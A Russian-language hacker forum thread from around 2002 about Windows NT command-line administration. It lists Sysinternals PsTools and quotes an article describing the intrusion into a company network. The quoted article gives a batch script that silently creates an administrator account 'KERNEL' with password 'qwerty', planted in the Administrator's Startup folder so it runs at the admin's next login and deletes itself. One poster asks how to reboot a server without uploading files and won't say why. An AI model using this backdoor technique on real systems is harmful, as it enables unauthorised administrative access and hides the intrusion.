aka pstools
http://sysinternals.com/ntw2k/freeware/pstools.shtml от Марка Русиновича - управление удаленными процессами из командной строки и т.д. (в том числе ребут с шатдауном)
PsExec - execute processes remotely
PsFile - shows files opened remotely
PsGetSid - display the SID of a computer or a user
PsKill - kill processes by name or process ID
PsInfo - list information about a system
PsList - list detailed information about processes
PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
PsLogList - dump event log records
PsService - view and control services
PsShutdown - shuts down and optionally reboots a computer
PsSuspend - suspends processes
PsUptime - shows you how long a system
далее будет вырезка из статьи
Изучение корпоративной сети компании
"XXXXX" Engineering Co. of North Carolina Inc".
которая опубликована на hackzone.ru
я думаю ты разбершся что к чему
Пишем следующий скрипт:
net user KERNEL qwerty /ADD /passwordreq:no
net localgroup Administrators KERNEL /ADD
del "c:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup\*" /Q >nul
del c:\kernel.cmd
Записываю его в корень диска "C" под именем kernel.cmd.
Затем в каталог:
C:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup закидываю ярлык, указывающий на файл c:\kernel.cmd. Теперь когда администратор зайдет на сервер, скрипт сработает и добавит пользователя KERNEL с правами Администратора и с паролем "qwerty". В конце концов скрипт удаляется.
> Записываю его в корень диска "C" под именем kernel.cmd. > Затем в каталог: > C:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup > закидываю ярлык, указывающий на файл c:\kernel.cmd. Теперь > когда администратор зайдет на сервер, скрипт сработает и > добавит пользователя KERNEL с правами Администратора и с > паролем "qwerty". В конце концов скрипт удаляется. Чё то я не понял если ты имеешь доступ к профилю админа, следовательно ты админ, либо у тебя есть права систем, но тогда зачем такой геморой? можно просто запустить скрипт и перелогиниться под новым юзером.
> Чё то я не понял если ты имеешь доступ к профилю админа, > следовательно ты админ не обезательно читал про новую дырку в вин2к???
> либо у тебя есть права систем, но > тогда зачем такой геморой? можно просто запустить скрипт и > перелогиниться под новым юзером. я цитировал!!!
я ничего не утверждаю
NT (cmd.exe) adduser[admin]16.05.02 20:23 Автор: cool Статус: Незарегистрированный пользователь
> Кто знает как консольно добавить USER'a c определенными > правами в WinNT?? > thnx. net help user |more
Читаешь до просветления, и потом
net help localgroup
(cmd.exe) reboot?17.05.02 18:31 Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
спасибо огромное.
еще один ээээ...."бонус"
как НЕ дожидаясь перезагрузить сервак.
Залить фаил я не могу(причин обьяснять не буду).
через цмд.ехе это возможо? может какой-нить ДОС?
thnx
(cmd.exe) reboot?21.05.02 20:09 Автор: ud Статус: Незарегистрированный пользователь
> спасибо огромное. > еще один ээээ...."бонус" > как НЕ дожидаясь перезагрузить сервак. > Залить фаил я не могу(причин обьяснять не буду). > через цмд.ехе это возможо? может какой-нить ДОС? > thnx
хихи, а что за секреты ?? я думал юникод уже оставили в покое -)))
2ud21.05.02 20:46 Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
в тулзе hyena есть удаленный ребут/шатдаун хостов (естесственно необзодимо иметь права админа)
кстати, я такую тулзу сам писал. могу выложить вместе с исходниками, если кому надо20.05.02 04:25 Автор: йцукенг <jcukeng> Статус: Member Отредактировано 20.05.02 04:29 Количество правок: 1
> в тулзе hyena есть удаленный ребут/шатдаун хостов > (естесственно необзодимо иметь права админа) кстати, я такую тулзу(для remote reboot) сам писал.
могу выложить вместе с исходниками, если кому надо.
Если не тяжело.... :) Дай линк так сказать :)20.05.02 09:34 Автор: DamNet <Denis Amelin> Статус: Elderman
aka pstools
http://sysinternals.com/ntw2k/freeware/pstools.shtml от Марка Русиновича - управление удаленными процессами из командной строки и т.д. (в том числе ребут с шатдауном)
PsExec - execute processes remotely
PsFile - shows files opened remotely
PsGetSid - display the SID of a computer or a user
PsKill - kill processes by name or process ID
PsInfo - list information about a system
PsList - list detailed information about processes
PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
PsLogList - dump event log records
PsService - view and control services
PsShutdown - shuts down and optionally reboots a computer
PsSuspend - suspends processes
PsUptime - shows you how long a system
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
